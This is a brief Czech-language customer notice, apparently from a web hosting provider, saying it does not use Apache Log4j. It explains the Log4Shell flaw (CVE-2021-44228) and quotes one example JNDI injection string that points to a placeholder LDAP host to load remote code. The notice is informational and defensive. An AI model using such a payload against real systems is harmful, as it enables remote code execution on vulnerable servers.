Vzhledem ke globální hysterii bychom chtěli ubezpečit naše klienty, že nikde na webhostingových serverech ani serverech v naší správě nepoužíváme Apache Log4j (CVE-2021-44228).

Popis problému: Byla nalezena chyba v protokolu knihovny Apache Log4j ve verzích od 2.0.0 do 2.15.0. Vzdálený útočník může na serveru spustit libovolný kód prostřednictvím JNDI LDAP koncového bodu. Kombinací nástroje JNDI a protokolu LDAP může útočník do zápisu poslat odkaz na soubor uložený kdekoli na webu: ${jndi:ldap://example.cz/kod} a spustit ho.

Více o závažném bezpečnostním problému si můžete přečíst na:

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

https://access.redhat.com/security/cve/cve-2021-44228